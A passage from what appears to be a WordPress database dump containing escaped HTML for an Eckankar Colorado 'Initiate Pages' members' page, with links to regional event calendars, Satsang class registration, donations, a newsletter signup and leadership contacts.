data-font-style=\"\">Initiator and ECK<br>\r\nSpiritual Aides</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px;\">Easily contact an ECK Initiator or request an ECK Spiritual Aide by filling out a simple form.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/\">Go Here To Get In Touch</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">State Leader<br>\r\nContacts</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Got a question or feedback for Colorado ECK leaders? Contact local RESA structure leaders.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/colorado-statewide-leadership-contacts/\">Contact an ECK Leader</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Add/Update Email<br>\r\nor Mail Address</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Update your information to stay informed about all the ECK news in Colorado!<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/update-email-mail/\">Add/Update Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"tmpl-services-2 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #e8e5e5; box-shadow: #cecece 0px 2px 4px -1px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.67), rgba(255, 255, 255, 0.67)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\'); background-size: cover; background-position: 50% 50%;\" data-bg-overlaycolor-alpha=\"0.67\" data-bg-overlaycolor-class=\"1\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.67)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; margin-top: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-12 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-5 col-sm-6 col-xs-10 align-column-center col-lg-5\" style=\"padding-right: 1em; box-shadow: #cecece 0px 2px 4px -1px inset; padding-left: 0em;\">\r\n<div style=\"border: 5px solid; margin-right: -50px; z-index: 1; position: relative; padding-top: 0px; padding-bottom: 0px; border-color: #d5b56b !important; box-shadow: rgba(0, 0, 0, 0.3) 0px 19px 38px, rgba(0, 0, 0, 0.22) 0px 15px 12px;\" class=\" bg-box bg-alpha-209\" data-alpha=\"0.96\" data-bg-uuid=\"bg-alpha-209\">\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 2px 4px -1px inset; margin-left: -11px; margin-right: -15px;\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 color1-background-color color-1-text-contrast bg-background-color col-lg-6\" style=\"margin-left: -3px; padding: 1.5em;\">\r\n<div>\r\n<h2 class=\"color3-color\" style=\"font-size: 36px; text-align: center; font-family: \'Raleway\'; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Welcome</h2>\r\n<h4 class=\"\" style=\"font-size: 25px; text-align: center; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">ECk Initiates</h4>\r\n<h4 class=\"\" style=\"font-size: 23px;\"><br>\r\n<img class=\"aligncenter wp-image-68742 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-sym-gold-sm.png\" alt=\"ECK Symbol\" width=\"71\" height=\"71\"></h4>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 align-column-center col-lg-6\">\r\n<div style=\"padding: 1em 1em 1em 1em;\" class=\"bg-box\">\r\n<p class=\"\" style=\"font-size: 24px; font-weight: 600; font-family: \'Raleway\'; color: rgba(62, 62, 62, 0.9);\" data-font-weight=\"600\" data-font-family=\"Raleway\" data-font-style=\"\">Divine love is not something you can talk about, but it is something that you can demonstrate as you live.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-2 col-lg-1\" style=\"background-color: #f5f2eb;\"></div>\r\n<div class=\"col-md-5 col-sm-5 col-xs-12 col-lg-5\" style=\"padding: 0em; background-color: #f5f2eb;\">\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-heart\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Donations</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">Giving to Eckankar in Colorado is simple. Your donations will help us continue to reach the public and grow Eckankar within the state. All donations of any size are greatly appreciated. </span></p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">You Can Use PayPal or Credit Card.<br>\r\n<a href=\"https://www.paypal.com/donate?hosted_button_id=WAKYPRQYTCFXE\">Donate Online Now</a> (or by <a href=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/Donation-authorization-form-12-2019-ch.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Mail-in)</a></span></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\">\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-newspaper-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE Newsletter Signup</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Sign up to receive your local Initiate Newsletter!<br>\r\nGet all the latest news and events from around the state. <br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/newsletter-subscription-members/\">Sign Up Today!</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-check-square-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Email Whitelisting</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Whitelisting is the process of adding our email to an approved sender list, so emails from us will not be blocked or sent to spam.<br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/email-whitelisting/\">Learn How To Do It</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-star\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Got a Vahana Project Idea?</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Do you want to help serve the Mahanta’s mission and have a great idea to share? We want to know about it!</p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Let us know how we can work together.<br>\r\n<a href=\"https://eckankar-colorado.org/chela-ideas/\">Click here to share the details</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(233833,39722,'post_new_post_content','<div class=\"tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #1d1d1d; box-shadow: #cecece 0px 0px 0px 0px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.18), rgba(255, 255, 255, 0.18)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.18)\" data-bg-overlaycolor-alpha=\"0.18\" data-bg-overlaycolor-class=\"1\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 75px; padding-bottom: 300px;\">\r\n<div class=\"col-lg-3 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center col-lg-6\" style=\"text-align: left; padding: 0em; background-color: rgba(255, 255, 255, 0); box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<blockquote class=\"color1-border-color\" style=\"margin: 52px 16px 20px auto; border-style: none; border-width: 0px; color: #585858; padding: 0em 2em 1em 5%; border-radius: 8px; background-color: none; width: 100%;\">\r\n<h1 class=\"\" style=\"text-transform: capitalize; font-size: 106px; letter-spacing: 2px; margin-top: 52px; box-shadow: #cecece 0px 0px 0px 0px; padding-left: 0em; margin-left: auto; margin-right: auto; text-align: center; width: auto; font-family: \'Alegreya SC\'; font-weight: 400; line-height: 89px; text-shadow: #ffffff 0px 0px 56px; color: #ad7a05;\" data-font-family=\"Alegreya SC\" data-font-weight=\"400\" data-font-style=\"\">Initiate Pages</h1>\r\n</blockquote>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-12\" style=\"padding: 2em; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px;\">\r\n<p class=\"\" style=\"font-size: 24px; font-family: Raleway; font-weight: 400;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">These pages are for those who have enrolled in Eckankar’s Spiritual Living Courses.<br>\r\nAll are welcome to explore the benefits of the ECK courses and initiation&nbsp;<a href=\"https://www.eckankar.org/engage/advanced-spiritual-living/eck-initations/\" target=\"_blank\" rel=\"noopener\">here</a>.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-call_to_action-1 boldgrid-section dynamic-gridblock background-parallax\" style=\"background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 23px; padding-top: 23px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-7 col-sm-8 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"bg-box-cover bg-box bg-alpha-879 bg-background-color color1-background-color color-1-text-contrast\" style=\"padding: 30px 5%; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-alpha=\"0.82\" data-bg-uuid=\"bg-alpha-879\">\r\n<p class=\"\" style=\"font-weight: 600; text-transform: none; font-size: 22px; line-height: 24px; color: #3e3e3e;\" data-font-weight=\"600\">Now Open For Registration</p>\r\n<p class=\"bg-font-family-alt\" style=\"color: #b67d00; font-size: 43px; line-height: 47px;\">2023-2024<br>\r\nInitiate&nbsp;<br>\r\nSatsang Classes</p>\r\n<p class=\"bg-font-family-alt\" style=\"font-size: 17px; line-height: 27px; color: #3e3e3e;\">An ECK Satsang class is a gathering of ECK members who choose to come together once or twice a month to further their spiritual understanding through study of the ECK discourses.</p>\r\n<p class=\"\"><a class=\"btn btn-raised btn-rounded btn-color-1\" href=\"https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/\" rel=\"noopener\">Register Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-14 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 64px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<p class=\"\" style=\"text-align: center; font-size: 27px; text-transform: capitalize; font-family: Raleway; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px; padding-bottom: 1em; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE EVENT CALENDARS</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 54px; background-color: #ffffff;\">\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Central Colorado</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205232 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/eck-temple-member-cal-promo.jpg\" alt=\"Clear mountain stream with driftwood near the shore\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/central-colorado-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\" data-bg-color-1=\"rgb(41, 100, 219)\" data-bg-color-2=\"rgb(255, 255, 255)\" data-bg-direction=\"to bottom\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">colorado springs</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-252359 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/cosprings-member-cal-promo.jpg\" alt=\"\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/colorado-springs-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">loveland</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/loveland-member-cal-promo.jpg\" alt=\"Green meadow overlooking mountains with clouds in the background\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/loveland-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500; letter-spacing: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Mountain Areas</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/12/mountain-area-member-cal-promo.jpg\" alt=\"Fall foliage and a mountain stream\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/mountain-area-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-10\" style=\"padding: 2em;\">\r\n<p class=\"h3\" style=\"font-weight: 600; margin-top: 20px; margin-bottom: 20px; font-family: Raleway; font-size: 24px; text-transform: none; font-style: italic; border-width: 0px; color: #3e3e3e;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"italic\"><i class=\"fa bg-inserted-icon fa-quote-left\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\">&nbsp;&nbsp; </i>We are personally responsible for our own state of consciousness. As Soul unfolds toward total freedom, It understands total responsibility must be accepted for every thought and action.&nbsp;&nbsp;</p>\r\n<h4 class=\"color3-color bg-font-family-alt\" style=\"text-transform: capitalize;\">—Harold Klemp</h4>\r\n<p class=\"\"><em><a class=\"bg-font-family-alt\" href=\"http://www.eckbooks.org/items/The_Language_of_Soul-943-6.html\" target=\"_blank\" rel=\"noopener noreferrer\">The Language of Soul</a></em></p>\r\n</div>\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-3 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-top: 24px; padding-bottom: 26px;\">\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Colorado State<br>\r\nRESA Structure</p>\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 18px;\">How does the Colorado RESA structure work? Check the chart or FAQ to get a quick overview.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2023/07/RESA-Org-Chart-5.13.23.pdf\">Org Chart </a>/ <a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/\" target=\"_blank\" rel=\"noopener\">RESA FAQ</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Initiator and ECK<br>\r\nSpiritual Aides</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px;\">Easily contact an ECK Initiator or request an ECK Spiritual Aide by filling out a simple form.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/\">Go Here To Get In Touch</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">State Leader<br>\r\nContacts</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Got a question or feedback for Colorado ECK leaders? Contact local RESA structure leaders.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/colorado-statewide-leadership-contacts/\">Contact an ECK Leader</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Add/Update Email<br>\r\nor Mail Address</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Update your information to stay informed about all the ECK news in Colorado!<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/update-email-mail/\">Add/Update Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"tmpl-services-2 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #e8e5e5; box-shadow: #cecece 0px 2px 4px -1px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.67), rgba(255, 255, 255, 0.67)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\'); background-size: cover; background-position: 50% 50%;\" data-bg-overlaycolor-alpha=\"0.67\" data-bg-overlaycolor-class=\"1\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.67)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; margin-top: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-12 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-5 col-sm-6 col-xs-10 align-column-center col-lg-5\" style=\"padding-right: 1em; box-shadow: #cecece 0px 2px 4px -1px inset; padding-left: 0em;\">\r\n<div style=\"border: 5px solid; margin-right: -50px; z-index: 1; position: relative; padding-top: 0px; padding-bottom: 0px; border-color: #d5b56b !important; box-shadow: rgba(0, 0, 0, 0.3) 0px 19px 38px, rgba(0, 0, 0, 0.22) 0px 15px 12px;\" class=\" bg-box bg-alpha-209\" data-alpha=\"0.96\" data-bg-uuid=\"bg-alpha-209\">\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 2px 4px -1px inset; margin-left: -11px; margin-right: -15px;\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 color1-background-color color-1-text-contrast bg-background-color col-lg-6\" style=\"margin-left: -3px; padding: 1.5em;\">\r\n<div>\r\n<h2 class=\"color3-color\" style=\"font-size: 36px; text-align: center; font-family: \'Raleway\'; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Welcome</h2>\r\n<h4 class=\"\" style=\"font-size: 25px; text-align: center; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">ECk Initiates</h4>\r\n<h4 class=\"\" style=\"font-size: 23px;\"><br>\r\n<img class=\"aligncenter wp-image-68742 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-sym-gold-sm.png\" alt=\"ECK Symbol\" width=\"71\" height=\"71\"></h4>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 align-column-center col-lg-6\">\r\n<div style=\"padding: 1em 1em 1em 1em;\" class=\"bg-box\">\r\n<p class=\"\" style=\"font-size: 24px; font-weight: 600; font-family: \'Raleway\'; color: rgba(62, 62, 62, 0.9);\" data-font-weight=\"600\" data-font-family=\"Raleway\" data-font-style=\"\">Divine love is not something you can talk about, but it is something that you can demonstrate as you 